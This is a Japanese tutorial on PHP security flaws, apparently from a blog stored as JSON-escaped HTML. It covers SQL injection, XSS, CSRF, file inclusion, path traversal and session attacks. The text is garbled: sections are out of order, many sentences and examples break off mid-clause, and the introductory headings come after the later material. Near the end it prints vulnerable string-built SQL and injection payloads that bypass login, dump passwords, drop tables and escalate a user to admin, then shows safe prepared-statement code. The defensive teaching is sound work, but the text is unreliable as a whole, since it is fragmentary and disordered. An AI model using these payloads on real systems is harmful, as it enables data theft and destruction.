\u3053\u308c\u306b\u3088\u308a\u3001\u5e38\u306b\u771f\u3068\u306a\u308b\u6761\u4ef6\u304c\u8ffd\u52a0\u3055\u308c\u3001\u5168\u30e6\u30fc\u30b6\u30fc\u306e\u30c7\u30fc\u30bf\u306b\u30a2\u30af\u30bb\u30b9\u3067\u304d\u3066\u3057\u307e\u3044\u307e\u3059\u3002\u3055\u3089\u306b\u60aa\u8cea\u306a\u653b\u6483\u3067\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u64cd\u4f5c\u3082\u53ef\u80fd\u306b\u306a\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u9632\u3050\u6700\u3082\u52b9\u679c\u7684\u306a\u65b9\u6cd5\u306f\u3001\u30d7\u30ea\u30da\u30a2\u30fc\u30c9\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u3068\u30d1\u30e9\u30e1\u30fc\u30bf\u30d0\u30a4\u30f3\u30c7\u30a3\u30f3\u30b0\u306e\u4f7f\u7528\u3067\u3059\u3002<\/p>\n\n\n\n SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u5bfe\u7b56\u306f\u3001Web\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306e\u57fa\u672c\u4e2d\u306e\u57fa\u672c\u3067\u3059\u3002\u3069\u3093\u306a\u306b\u5c0f\u3055\u306a\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3067\u3082\u3001\u5fc5\u305a\u30d7\u30ea\u30da\u30a2\u30fc\u30c9\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u3092\u4f7f\u7528\u3057\u3001\u751f\u306eSQL\u30af\u30a8\u30ea\u306b\u76f4\u63a5\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u3092\u7d50\u5408\u3059\u308b\u3053\u3068\u306f\u7d76\u5bfe\u306b\u907f\u3051\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n \u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff08XSS\uff09\u306f\u3001\u653b\u6483\u8005\u304cWeb\u30da\u30fc\u30b8\u306b\u60aa\u610f\u306e\u3042\u308b\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30b5\u30a4\u30c9\u30b9\u30af\u30ea\u30d7\u30c8\uff08\u4e3b\u306bJavaScript\uff09\u3092\u6ce8\u5165\u3057\u3001\u305d\u308c\u304c\u4ed6\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u30d6\u30e9\u30a6\u30b6\u3067\u5b9f\u884c\u3055\u308c\u308b\u8106\u5f31\u6027\u3067\u3059\u3002PHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3067\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u306e\u9069\u5207\u306a\u30a8\u30b9\u30b1\u30fc\u30d7\u3092\u6020\u308b\u3068\u3001XSS\u653b\u6483\u306e\u5371\u967a\u6027\u304c\u9ad8\u307e\u308a\u307e\u3059\u3002<\/p>\n\n\n\n XSS\u653b\u6483\u306f\u4e3b\u306b3\u3064\u306e\u30bf\u30a4\u30d7\u306b\u5206\u985e\u3055\u308c\u307e\u3059\uff1a<\/p>\n\n\n\n \u6700\u3082\u57fa\u672c\u7684\u304b\u3064\u91cd\u8981\u306a\u5bfe\u7b56\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u3092\u51fa\u529b\u3059\u308b\u969b\u306b\u9069\u5207\u306b\u30a8\u30b9\u30b1\u30fc\u30d7\u3059\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n\n\n\n \u51fa\u529b\u5148\u306e\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\uff08HTML\u3001JavaScript\u3001CSS\u3001URL\uff09\u306b\u3088\u3063\u3066\u3001\u9069\u5207\u306a\u30a8\u30b9\u30b1\u30fc\u30d7\u65b9\u6cd5\u304c\u7570\u306a\u308a\u307e\u3059\u3002<\/p>\n\n\n\n HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u30d8\u30c3\u30c0\u30fc\u306b\u9069\u5207\u306aCSP\u8a2d\u5b9a\u3092\u8ffd\u52a0\u3059\u308b\u3053\u3068\u3067\u3001XSS\u653b\u6483\u306e\u30ea\u30b9\u30af\u3092\u5927\u5e45\u306b\u8efd\u6e1b\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n \u30e2\u30c0\u30f3\u306aPHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306f\u3001\u81ea\u52d5\u7684\u306aXSS\u5bfe\u7b56\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n \u51fa\u529b\u30a8\u30b9\u30b1\u30fc\u30d7\u306b\u52a0\u3048\u3066\u3001\u5165\u529b\u6642\u70b9\u3067\u306e\u30d0\u30ea\u30c7\u30fc\u30b7\u30e7\u30f3\u3068\u30b5\u30cb\u30bf\u30a4\u30ba\u3082\u91cd\u8981\u3067\u3059\u3002<\/p>\n\n\n\n XSS\u653b\u6483\u306f\u4f9d\u7136\u3068\u3057\u3066Web\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u4e3b\u8981\u306a\u8105\u5a01\u3067\u3059\u3002PHP\u958b\u767a\u8005\u306f\u3001\u3059\u3079\u3066\u306e\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u3092\u4e0d\u4fe1\u3057\u3001\u9069\u5207\u306a\u5bfe\u7b56\u3092\u8b1b\u3058\u308b\u7fd2\u6163\u3092\u8eab\u306b\u3064\u3051\u308b\u3053\u3068\u304c\u91cd\u8981\u3067\u3059\u3002\u7279\u306b\u3001\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u30a8\u30f3\u30b8\u30f3\u3084\u5c02\u7528\u306e\u51fa\u529b\u95a2\u6570\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3001\u4e00\u8cab\u3057\u305fXSS\u5bfe\u7b56\u3092\u5b9f\u88c5\u3057\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n \u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30ea\u30af\u30a8\u30b9\u30c8\u30d5\u30a9\u30fc\u30b8\u30a7\u30ea\uff08CSRF\uff09\u306f\u3001\u653b\u6483\u8005\u304c\u88ab\u5bb3\u8005\u306e\u30d6\u30e9\u30a6\u30b6\u3092\u4f7f\u3063\u3066\u3001\u88ab\u5bb3\u8005\u306e\u8a8d\u8a3c\u6e08\u307f\u30bb\u30c3\u30b7\u30e7\u30f3\u3067\u4e0d\u6b63\u306a\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u9001\u4fe1\u3059\u308b\u653b\u6483\u3067\u3059\u3002\u30e6\u30fc\u30b6\u30fc\u304c\u77e5\u3089\u306a\u3044\u9593\u306b\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4\u3084\u8cc7\u91d1\u8ee2\u9001\u306a\u3069\u306e\u64cd\u4f5c\u304c\u5b9f\u884c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n CSRF\u306f\u4ee5\u4e0b\u306e\u6761\u4ef6\u304c\u63c3\u3046\u3068\u767a\u751f\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n \u4ee5\u4e0b\u306e\u3088\u3046\u306a\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eHTML\u304c\u5b58\u5728\u3059\u308b\u3068\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n \u30e6\u30fc\u30b6\u30fc\u304c\u3053\u306e\u30da\u30fc\u30b8\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\u30d0\u30f3\u30ad\u30f3\u30b0\u30b5\u30a4\u30c8\u3078\u306e\u8cc7\u91d1\u8ee2\u9001\u30ea\u30af\u30a8\u30b9\u30c8\u304c\u81ea\u52d5\u7684\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002\u30e6\u30fc\u30b6\u30fc\u304c\u305d\u306e\u30b5\u30a4\u30c8\u306b\u30ed\u30b0\u30a4\u30f3\u6e08\u307f\u3067\u3042\u308c\u3070\u3001\u653b\u6483\u306f\u6210\u529f\u3057\u307e\u3059\u3002<\/p>\n\n\n\n \u6700\u3082\u52b9\u679c\u7684\u306aCSRF\u5bfe\u7b56\u306f\u3001\u5404\u30d5\u30a9\u30fc\u30e0\u3084\u30ea\u30af\u30a8\u30b9\u30c8\u306b\u4e00\u610f\u306e\u30c8\u30fc\u30af\u30f3\u3092\u542b\u3081\u3001\u30b5\u30fc\u30d0\u30fc\u5074\u3067\u691c\u8a3c\u3059\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n\n\n\n \u30e2\u30c0\u30f3\u306a\u30d6\u30e9\u30a6\u30b6\u3067\u306f\u3001SameSite Cookie\u5c5e\u6027\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3001\u5916\u90e8\u30b5\u30a4\u30c8\u304b\u3089\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u3067Cookie\u304c\u9001\u4fe1\u3055\u308c\u306a\u3044\u3088\u3046\u306b\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n \u4e3b\u8981\u306aPHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306b\u306f\u3001CSRF\u5bfe\u7b56\u304c\u7d44\u307f\u8fbc\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n CSRF\u5bfe\u7b56\u306f\u3001\u7279\u306b\u30e6\u30fc\u30b6\u30fc\u306e\u72b6\u614b\u3092\u5909\u66f4\u3059\u308b\u64cd\u4f5c\uff08POST\u3001PUT\u3001DELETE\u30ea\u30af\u30a8\u30b9\u30c8\u306a\u3069\uff09\u306b\u5fc5\u9808\u306e\u9632\u5fa1\u7b56\u3067\u3059\u3002API\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u3082\u542b\u3081\u3001\u8a8d\u8a3c\u3092\u5fc5\u8981\u3068\u3059\u308b\u3059\u3079\u3066\u306e\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u306bCSRF\u5bfe\u7b56\u3092\u5b9f\u88c5\u3057\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n \u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u306f\u3001PHP\u306e \u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u306f\u4e3b\u306b2\u3064\u306e\u30bf\u30a4\u30d7\u306b\u5206\u3051\u3089\u308c\u307e\u3059\uff1a<\/p>\n\n\n\n \u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u3092\u542b\u3093\u3067\u3044\u307e\u3059\uff1a<\/p>\n\n\n\n \u3053\u306e\u5834\u5408\u3001 \u3053\u306e\u653b\u6483\u306f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\uff08\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\uff09\u3068\u7d44\u307f\u5408\u308f\u305b\u3066\u884c\u308f\u308c\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u91cd\u8981\u30d5\u30a1\u30a4\u30eb\uff08Linux\u74b0\u5883\u3067\u306f \u6700\u3082\u78ba\u5b9f\u306a\u5bfe\u7b56\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u3092\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u306e\u69cb\u7bc9\u306b\u4f7f\u7528\u3057\u306a\u3044\u3053\u3068\u3067\u3059\u3002\u4ee3\u308f\u308a\u306b\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30de\u30c3\u30d4\u30f3\u30b0\u65b9\u5f0f\u3092\u4f7f\u7528\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n \u8a31\u53ef\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u30ea\u30b9\u30c8\u306b\u5bfe\u3057\u3066\u691c\u8a3c\u3092\u884c\u3044\u307e\u3059\uff1a<\/p>\n\n\n\n \u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u3092\u6b63\u898f\u5316\u3057\u3066\u691c\u8a3c\u3059\u308b\u65b9\u6cd5\uff1a<\/p>\n\n\n\n \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u653b\u6483\u3092\u9632\u3050\u305f\u3081\u306b \u305f\u3060\u3057\u3001 \u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u306f\u3001\u9069\u5207\u306a\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u306e\u691c\u8a3c\u3068\u5b89\u5168\u306a\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30d7\u30e9\u30af\u30c6\u30a3\u30b9\u306b\u3088\u3063\u3066\u9632\u3050\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u7279\u306bCMS\u3084\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u3092\u81ea\u4f5c\u3059\u308b\u5834\u5408\u306f\u3001\u3053\u308c\u3089\u306e\u5bfe\u7b56\u3092\u5341\u5206\u306b\u8003\u616e\u3057\u305f\u30b3\u30fc\u30c9\u3092\u66f8\u304f\u3088\u3046\u306b\u3057\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n \u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\uff08\u307e\u305f\u306f\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\uff09\u306f\u3001\u653b\u6483\u8005\u304c\u30a6\u30a7\u30d6\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u5236\u7d04\u3092\u56de\u907f\u3057\u3066\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u610f\u56f3\u3055\u308c\u3066\u3044\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u3084\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u653b\u6483\u624b\u6cd5\u3067\u3059\u3002\u7279\u306b\u3001\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u306b\u57fa\u3065\u3044\u3066\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308bPHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3067\u767a\u751f\u3057\u3084\u3059\u3044\u8106\u5f31\u6027\u3067\u3059\u3002<\/p>\n\n\n\n \u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u653b\u6483\u306f\u3001\u4e3b\u306b\u76f8\u5bfe\u30d1\u30b9\u8868\u8a18\uff08 \u3053\u306e\u5834\u5408\u3001\u653b\u6483\u8005\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306aURL\u3092\u4f7f\u7528\u3057\u3066\u653b\u6483\u3092\u8a66\u307f\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n \u3053\u308c\u306b\u3088\u308a\u3001Linux\u30b7\u30b9\u30c6\u30e0\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u30d5\u30a1\u30a4\u30eb\u304c\u8868\u793a\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u307e\u305f\u3001URL\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306a\u3069\u306e\u624b\u6cd5\u3092\u4f7f\u3063\u3066\u691c\u51fa\u3092\u56de\u907f\u3059\u308b\u3053\u3068\u3082\u3042\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n \u5178\u578b\u7684\u306a\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u653b\u6483\u306e\u30b7\u30ca\u30ea\u30aa\u306b\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u304c\u3042\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n \u6700\u3082\u52b9\u679c\u7684\u306a\u5bfe\u7b56\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u3092\u6b63\u898f\u5316\u3057\u3001\u610f\u56f3\u3057\u305f\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5185\u306b\u3042\u308b\u304b\u3092\u691c\u8a3c\u3059\u308b\u3053\u3068\u3067\u3059\uff1a<\/p>\n\n\n\n \u3053\u306e\u65b9\u6cd5\u306e\u5229\u70b9\u306f\uff1a<\/p>\n\n\n\n \u7279\u5b9a\u306e\u72b6\u6cc1\u3067\u306f\u3001\u8a31\u53ef\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u30ea\u30b9\u30c8\u3092\u4f7f\u7528\u3059\u308b\u65b9\u6cd5\u304c\u52b9\u679c\u7684\u3067\u3059\uff1a<\/p>\n\n\n\n \u7279\u5b9a\u306e\u62e1\u5f35\u5b50\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u307f\u3092\u8a31\u53ef\u3059\u308b\u65b9\u6cd5\uff1a<\/p>\n\n\n\n \u30d5\u30a1\u30a4\u30eb\u3078\u306e\u76f4\u63a5\u30a2\u30af\u30bb\u30b9\u3067\u306f\u306a\u304f\u3001ID\u307e\u305f\u306f\u30c8\u30fc\u30af\u30f3\u30d9\u30fc\u30b9\u306e\u30a2\u30d7\u30ed\u30fc\u30c1\u3092\u4f7f\u7528\uff1a<\/p>\n\n\n\n \u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u8106\u5f31\u6027\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u6a5f\u80fd\u3084\u753b\u50cf\u8868\u793a\u6a5f\u80fd\u306a\u3069\u3001\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u591a\u304f\u306ePHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306b\u5b58\u5728\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u9069\u5207\u306a\u5165\u529b\u691c\u8a3c\u3068\u30d1\u30b9\u64cd\u4f5c\u306e\u5b89\u5168\u306a\u5b9f\u88c5\u306b\u3088\u308a\u3001\u3053\u306e\u8106\u5f31\u6027\u3092\u52b9\u679c\u7684\u306b\u9632\u3050\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n \u30bb\u30c3\u30b7\u30e7\u30f3\u7ba1\u7406\u306fWeb\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u8a8d\u8a3c\u72b6\u614b\u3092\u7dad\u6301\u3059\u308b\u305f\u3081\u306e\u91cd\u8981\u306a\u4ed5\u7d44\u307f\u3067\u3059\u3002PHP\u306f\u30bb\u30c3\u30b7\u30e7\u30f3\u7ba1\u7406\u6a5f\u80fd\u3092\u7c21\u5358\u306b\u5229\u7528\u3067\u304d\u308b\u4e00\u65b9\u3067\u3001\u5b89\u5168\u6027\u3092\u8003\u616e\u3057\u3066\u3044\u306a\u3044\u5b9f\u88c5\u306f\u6df1\u523b\u306a\u8106\u5f31\u6027\u3092\u3082\u305f\u3089\u3059\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n \u30bb\u30c3\u30b7\u30e7\u30f3\u30cf\u30a4\u30b8\u30e3\u30c3\u30af\u306f\u3001\u653b\u6483\u8005\u304c\u6b63\u898f\u30e6\u30fc\u30b6\u30fc\u306e\u30bb\u30c3\u30b7\u30e7\u30f3ID\u3092\u4f55\u3089\u304b\u306e\u65b9\u6cd5\u3067\u5165\u624b\u3057\u3001\u305d\u306e\u30bb\u30c3\u30b7\u30e7\u30f3\u3092\u4e57\u3063\u53d6\u308b\u653b\u6483\u3067\u3059\u3002\u30bb\u30c3\u30b7\u30e7\u30f3ID\u306e\u6f0f\u6d29\u7d4c\u8def\u306b\u306f\u4ee5\u4e0b\u304c\u3042\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n \u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u306f\u3001\u653b\u6483\u8005\u304c\u81ea\u5206\u306e\u30bb\u30c3\u30b7\u30e7\u30f3ID\u3092\u88ab\u5bb3\u8005\u306b\u4f7f\u308f\u305b\u308b\u653b\u6483\u3067\u3059\u3002\u653b\u6483\u8005\u306f\u30bb\u30c3\u30b7\u30e7\u30f3ID\u3092\u77e5\u3063\u3066\u3044\u308b\u305f\u3081\u3001\u88ab\u5bb3\u8005\u304c\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3068\u540c\u3058\u30bb\u30c3\u30b7\u30e7\u30f3\u3092\u5171\u6709\u3067\u304d\u3066\u3057\u307e\u3044\u307e\u3059\u3002<\/p>\n\n\n\ndisplay_errors = On<\/code>\u306e\u3088\u3046\u306a\u3001\u672c\u756a\u74b0\u5883\u306b\u306f\u9069\u3055\u306a\u3044\u8a2d\u5b9a\u304c\u6709\u52b9\u306b\u306a\u3063\u3066\u3044\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n\u8106\u5f31\u6027\u304c\u5f15\u304d\u8d77\u3053\u3059\u5b9f\u969b\u306e\u88ab\u5bb3\u4e8b\u4f8b<\/h3>\n\n\n\n
2023\u5e74 LearnPress \u30d7\u30e9\u30b0\u30a4\u30f3\u306eSQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u4e8b\u4ef6<\/h4>\n\n\n\n
2024\u5e74 Magento\u30b5\u30a4\u30c8\u96c6\u56e3\u30cf\u30c3\u30ad\u30f3\u30b0<\/h4>\n\n\n\n
2025\u5e74\u521d\u982d Laravel\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306e\u8a8d\u8a3c\u30d0\u30a4\u30d1\u30b9\u4e8b\u4f8b<\/h4>\n\n\n\n
2024\u5e74 PHP\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u30b5\u30d7\u30e9\u30a4\u30c1\u30a7\u30fc\u30f3\u653b\u6483<\/h4>\n\n\n\n
PHP\u8106\u5f31\u6027\u306e\u57fa\u672c\u77e5\u8b58<\/h2>\n\n\n\n
\u8106\u5f31\u6027\u3068\u306f\u4f55\u304b \u2013 \u57fa\u672c\u7684\u306a\u6982\u5ff5\u306e\u7406\u89e3<\/h3>\n\n\n\n
1. \u8a2d\u8a08\u4e0a\u306e\u6b20\u9665<\/h4>\n\n\n\n
2. \u5b9f\u88c5\u30df\u30b9<\/h4>\n\n\n\n
\/\/ \u8106\u5f31\u306a\u30b3\u30fc\u30c9\u4f8b\n$query = \"SELECT * FROM users WHERE username = '\" . $_GET['username'] . \"'\";\n<\/pre>\n\n\n\n
3. \u904b\u7528\u4e0a\u306e\u554f\u984c<\/h4>\n\n\n\n
PHP\u306b\u304a\u3051\u308b\u8106\u5f31\u6027\u306e\u7279\u5fb4<\/h3>\n\n\n\n
\u8a00\u8a9e\u8a2d\u8a08\u306b\u8d77\u56e0\u3059\u308b\u7279\u5fb4<\/h4>\n\n\n\n
\n
\/\/ \u6570\u5024\u3068\u6587\u5b57\u5217\u306e\u6bd4\u8f03 if (\"0e123456\" == \"0e789012\") { \/\/ true \u3068\u8a55\u4fa1\u3055\u308c\u308b \/\/ \u4e21\u65b9\u304c\u79d1\u5b66\u7684\u8868\u8a18\u6cd5\u3068\u3057\u3066\u89e3\u91c8\u3055\u308c\u308b\u305f\u3081 }<\/code><\/li>\n\n\n\n$_GET<\/code>\u3001$_POST<\/code>\u3001$_REQUEST<\/code>\u306a\u3069\u306e\u30b9\u30fc\u30d1\u30fc\u30b0\u30ed\u30fc\u30d0\u30eb\u5909\u6570\u306f\u3001\u3069\u3053\u304b\u3089\u3067\u3082\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u3067\u3001\u30b3\u30fc\u30c9\u306e\u8907\u96d1\u6027\u3092\u9ad8\u3081\u3001\u5165\u529b\u691c\u8a3c\u306e\u4e0d\u5099\u3092\u62db\u304d\u3084\u3059\u304f\u306a\u308a\u307e\u3059\u3002<\/li>\n\n\n\nallow_url_fopen<\/code>\u306f\u3001\u30ea\u30e2\u30fc\u30c8\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u306e\u30ea\u30b9\u30af\u3092\u9ad8\u3081\u3066\u3044\u307e\u3057\u305f\u3002<\/li>\n<\/ol>\n\n\n\n\u4ed6\u8a00\u8a9e\u3068\u306e\u6bd4\u8f03<\/h4>\n\n\n\n
\n
\u30e2\u30c0\u30f3PHP\u306e\u9032\u5316<\/h4>\n\n\n\n
\n
9\u3064\u306e\u4e3b\u8981\u306aPHP\u8106\u5f31\u6027\u30bf\u30a4\u30d7\u3068\u5bfe\u7b56<\/h2>\n\n\n\n
SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 \u2013 \u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u64cd\u4f5c\u3092\u60aa\u7528\u3057\u305f\u653b\u6483<\/h3>\n\n\n\n
\u653b\u6483\u306e\u4ed5\u7d44\u307f\u3068\u5371\u967a\u6027<\/h4>\n\n\n\n
\/\/ \u8106\u5f31\u306a\u30b3\u30fc\u30c9\u4f8b\n$username = $_POST['username'];\n$query = \"SELECT * FROM users WHERE username = '$username'\";\n$result = $mysqli->query($query);\n<\/pre>\n\n\n\n
admin' OR '1'='1<\/code> \u306e\u3088\u3046\u306a\u30c6\u30ad\u30b9\u30c8\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u7d50\u679c\u7684\u306b\u4ee5\u4e0b\u306eSQL\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\uff1a<\/p>\n\n\n\nSELECT * FROM users WHERE username = 'admin' OR '1'='1'\n<\/pre>\n\n\n\n
\n
' UNION SELECT username, password FROM users --<\/code><\/li>\n\n\n\n'; DROP TABLE users; --<\/code><\/li>\n\n\n\n'; UPDATE users SET role = 'admin' WHERE username = 'attacker'; --<\/code><\/li>\n<\/ul>\n\n\n\n\u9632\u5fa1\u7b56\uff1a\u30d7\u30ea\u30da\u30a2\u30fc\u30c9\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u306e\u4f7f\u7528<\/h4>\n\n\n\n
PDO\u3092\u4f7f\u7528\u3057\u305f\u5b89\u5168\u306a\u30b3\u30fc\u30c9\u4f8b<\/h5>\n\n\n\n
try {\n \/\/ \u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u63a5\u7d9a\n $pdo = new PDO('mysql:host=localhost;dbname=mydb', 'username', 'password');\n $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n \n \/\/ \u30d7\u30ea\u30da\u30a2\u30fc\u30c9\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u306e\u6e96\u5099\n $stmt = $pdo->prepare(\"SELECT * FROM users WHERE username = :username\");\n \n \/\/ \u30d1\u30e9\u30e1\u30fc\u30bf\u306e\u30d0\u30a4\u30f3\u30c9\n $stmt->bindParam(':username', $_POST['username'], PDO::PARAM_STR);\n \n \/\/ \u30af\u30a8\u30ea\u306e\u5b9f\u884c\n $stmt->execute();\n \n \/\/ \u7d50\u679c\u306e\u53d6\u5f97\n $user = $stmt->fetch(PDO::FETCH_ASSOC);\n} catch (PDOException $e) {\n \/\/ \u30a8\u30e9\u30fc\u51e6\u7406\n error_log('\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30a8\u30e9\u30fc: ' . $e->getMessage());\n echo \"\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3057\u307e\u3057\u305f\u3002\u7ba1\u7406\u8005\u306b\u304a\u554f\u3044\u5408\u308f\u305b\u304f\u3060\u3055\u3044\u3002\";\n}\n<\/pre>\n\n\n\nMySQLi\u3092\u4f7f\u7528\u3057\u305f\u5b89\u5168\u306a\u30b3\u30fc\u30c9\u4f8b<\/h5>\n\n\n\n
